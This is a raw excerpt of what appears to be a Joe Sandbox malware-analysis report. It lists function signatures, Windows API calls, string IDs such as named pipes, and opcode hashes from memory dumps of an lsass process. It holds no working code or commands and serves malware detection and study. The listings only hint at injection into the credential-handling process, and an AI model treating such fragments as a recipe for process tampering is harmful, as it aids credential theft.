                                                          • Instruction ID: d4c8c24966d39016955a1db9846a553d2bea095b48411aa5f7967032cc521d0f
                                                          • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                          • Instruction Fuzzy Hash: 081104B6618B8086E7108B21F40C75A6771F389BE5F544316EA9E06EA8CF7CC949CB00
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction ID: e207afeac99c483b23ca70e1e15b51e9258d1619311ba5b43c5831fe42b5bb13
                                                          • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction Fuzzy Hash: 0181E5E2600E414EFB66AF6EB88D35922D1A7957C0F144017AA4F67F97EB7CCD468700
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002D6F151A3B3,?,?,?,000002D6F1519B9C,?,?,?,?,000002D6F15196BD), ref: 000002D6F151A279
                                                          • GetLastError.KERNEL32(?,?,?,000002D6F151A3B3,?,?,?,000002D6F1519B9C,?,?,?,?,000002D6F15196BD), ref: 000002D6F151A287
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002D6F151A3B3,?,?,?,000002D6F1519B9C,?,?,?,?,000002D6F15196BD), ref: 000002D6F151A2B1
                                                          • FreeLibrary.KERNEL32(?,?,?,000002D6F151A3B3,?,?,?,000002D6F1519B9C,?,?,?,?,000002D6F15196BD), ref: 000002D6F151A2F7
                                                          • GetProcAddress.KERNEL32(?,?,?,000002D6F151A3B3,?,?,?,000002D6F1519B9C,?,?,?,?,000002D6F15196BD), ref: 000002D6F151A303
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                          • Instruction ID: cd56abd0b15b46bfa7f6e75feb324c8a2dbd782cc1bfc98f481b084187e69c1c
                                                          • Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                          • Instruction Fuzzy Hash: C231A562312ED099EE17DF96B80C7952394B748BE0F5905279D2F27B91EF3DD9458300
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                          • Instruction ID: 143dbac3a442536613272f400a2b94a61a41b1b27845f89f55d1593b6f4161ce
                                                          • Opcode Fuzzy Hash: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                          • Instruction Fuzzy Hash: 98115BA2210E808AE7908B52F88C71966A4F799BE4F144226EE5F87B94CF3CC8148740
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID: wr
                                                          • API String ID: 1092925422-2678910430
                                                          • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                          • Instruction ID: 03de86d683a12fb17ccc59ee8c9ece19a0ba9433239c681a6c7baa4ec7ae2cf7
                                                          • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                          • Instruction Fuzzy Hash: CD115EA6704B808AEB559F26F45C2696275FB48BD4F14442ADE8E07B54EF3DC944C708
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                          • Instruction ID: fe096de8faa0c72c89be56b2c7d76b0fc97ac365f8a7fb52167edee8a6af2a22
                                                          • Opcode Fuzzy Hash: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                          • Instruction Fuzzy Hash: D3D18AB6204F8889DA719F1AF49935A77A1F388BC4F500116EACE57BA5CF7CC941CB40
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: dialer
                                                          • API String ID: 756756679-3528709123
                                                          • Opcode ID: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                          • Instruction ID: cb24b82235290dcfeaa1a5b5c86bc8f3020527c4d096cae8eb02b05cfc284e48
                                                          • Opcode Fuzzy Hash: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                          • Instruction Fuzzy Hash: 6A31BFA2701F918AEB92EF56F45C7A963A0BB54BD0F0840268E5E13F55EF3CD865C300
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,000002D6F151DAE5,?,?,?,?,000002D6F151DBA8), ref: 000002D6F151D3DF
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F151DAE5,?,?,?,?,000002D6F151DBA8), ref: 000002D6F151D415
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F151DAE5,?,?,?,?,000002D6F151DBA8), ref: 000002D6F151D442
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F151DAE5,?,?,?,?,000002D6F151DBA8), ref: 000002D6F151D453
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F151DAE5,?,?,?,?,000002D6F151DBA8), ref: 000002D6F151D464
                                                          • SetLastError.KERNEL32(?,?,?,000002D6F151DAE5,?,?,?,?,000002D6F151DBA8), ref: 000002D6F151D47F
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                          • Instruction ID: 8506cdb58421c1a2dc0f91b69b68bb360fa35a484a2193f2d54768caec376632
                                                          • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                          • Instruction Fuzzy Hash: F81172E5345E804AFA5AAB32768D36962526B447F0F140727983F27FD6DEECEC028600
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                          • Instruction ID: 5fe1c14b9eb4ede84857b937708227874442c3c06e68d1dba0401947e5a09b33
                                                          • Opcode Fuzzy Hash: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                          • Instruction Fuzzy Hash: 1E0129A2704E808AEB14DB22B89C75963A1F788FC1F584136DE9E43B54DF3CC989C744
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                          • Instruction ID: b25aeba175a1d52ce49f39f024d222154bdf59954bbbc389921beefab7ebde51
                                                          • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                          • Instruction Fuzzy Hash: 96014CA6611F848AEB659F22F85D71973B1BB48BD5F04052ACD4E07B64EF3DC8498704
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: 124d9c0b905e6e6f2e62f9bd05bcfd16d2c666ef5833f5a39d15387171bb82e0
                                                          • Instruction ID: 7aaeb7a1e61166fbc537c925b5fae37ebf0e7ad427beefa535fed541ff56aab3
                                                          • Opcode Fuzzy Hash: 124d9c0b905e6e6f2e62f9bd05bcfd16d2c666ef5833f5a39d15387171bb82e0
                                                          • Instruction Fuzzy Hash: 2E519CB2601A408EEB26CF25F45CB593795F740BCCF5281269E4B63B88EB39CD81C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: displacement map'$csm$f
                                                          • API String ID: 3242871069-3478954885
                                                          • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction ID: 7f5c5d8e9470d66b957bfc8c1c3338b0ec93afe50deec6401467a33702c9d897
                                                          • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction Fuzzy Hash: C2517832A11A028EEF58CB16F44CB292795F3D4BD8F518126DA9747B8CEB39DE418705
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: displacement map'$csm$f
                                                          • API String ID: 3242871069-3478954885
                                                          • Opcode ID: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                          • Instruction ID: 45405553451469b45eac78d0a27992a921ad8a96e017e10848fda10da5bbd544
                                                          • Opcode Fuzzy Hash: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                          • Instruction Fuzzy Hash: 98314732611A419EEB14DF12F84CB2937A4F790BD8F158116AEAB47B99DB3CCE41CB04
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                          • Instruction ID: d16a780318cda608f8b86a1a574e3523fb1ef354d4efb62528e37e0558b37a0f
                                                          • Opcode Fuzzy Hash: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                          • Instruction Fuzzy Hash: E6F06DE6311E8089EE108B24F84C7296370AB897E5F64121ACA6F46AE4CF2DCC48C300
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                          • Instruction ID: 7ead5fb1b129f62b4208d18be29186b9c682591ff5f1a5b2de3a9d28cb4facb0
                                                          • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                          • Instruction Fuzzy Hash: 8FF08CA2304FC086EA548B17B91C1196260BB58FD0F088032EE5F57F18CF3CC8458700
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                          • Instruction ID: 89d636a0aaf0305d3c2b750672473a3089241b624bb6adbf6f8c0a637c2c3dcb
                                                          • Opcode Fuzzy Hash: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                          • Instruction Fuzzy Hash: 3602C876219B848AEB61CF55F49835AB7A1F3C57D4F100016EA8E97BA8DB7CC844CF40
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                          • Instruction ID: 3cf1d840d9dcf03ccab45b6317aed8e22d9a44c678f1cd2c9aaaf629766997cd
                                                          • Opcode Fuzzy Hash: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                          • Instruction Fuzzy Hash: 376198B6529E848AEA618F15F49C31AB7A1F3897C4F500216EA8E57FA4DB7CC941CF40
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: fde2b21e776fc07e25fd0f4d69b870269d16fc1e724c27e0e56a2b69d65337ab
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 1411C272A18E005DFA581768F44E76910806BE83F4F491637AAB70FFEECB2C8D44C211
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 6bf7b93cdd6d6b59f790cacbec3de3887d575f98c22ffbb4cbb491e375e5bb81
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 0B1170B3B10E9109FA541768F45E36911816B793F8F484626EAAF17EEACB2C8C458200
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                          • Instruction ID: 987f609ed5bf0ba5cc83df458c4046ed743a7fad4121f2e9117aa177a313dc53
                                                          • Opcode Fuzzy Hash: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                          • Instruction Fuzzy Hash: 9A6159B7600B848AEB229FA5E44839D77A1F344BC8F144216EE5E27B99DB7CC995C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction ID: f9c4f8e6206a8963f6a7b47ead92b620a722661ef74abdf4d243677e63d5d571
                                                          • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction Fuzzy Hash: 2E516B32100A808EEB64CB26A54C35877A1E7D5BD8F249217DA9B47FD9CB3CDE51CB11
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
